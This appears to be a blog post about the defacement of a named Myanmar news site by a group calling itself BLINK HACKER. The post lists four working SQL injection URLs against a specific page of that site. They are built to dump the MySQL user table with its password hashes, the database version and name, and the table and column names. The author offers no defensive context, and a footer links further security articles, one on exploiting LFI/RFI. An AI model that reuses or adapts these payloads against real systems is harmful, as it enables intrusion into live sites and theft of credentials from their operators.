A hacker group named themselves BLINK HACKER hacked http://www.khitlunge.net.mm and it’s a social and news site for Myanmar Latest News, Myanmar Breaking News, Myanmar Update News.

I don’t know how they attack and defaced but one of my team member reported and mailed me yesterday before Blink Hacker defaced it.

SQL Injection of Khitlunge.net.mm is as follow..

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28user,0x3a,password%29,4,5,6%20from%20mysql.user--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,4,5,6--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28table_name%29,4,5,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28column_name%29,4,5,6%20from%20information_schema.columns%20where%20table_schema=database%28%29--

Explore More

What are the various modes of system security testing?

The various modes of system security testing are as follows: 1. Remote network: This mode attempts to simulate an attack launched over the Internet. The primary defenses that must be

Read More

LFI/RFI testing and exploiting with fimap

fimap is currently under development but still usable. Feel free to test it! This document and tool is not recommend for people who doesn’t know what LFI/RFI is. If you

Read More

Huge internet bill? Are you a zombie? How does your computer act as zombie?

Zombie or zombie computers are becoming the number one source of all malware and spam attacks. A zombie is a computer attached to the Internet that has been compromised by

Read More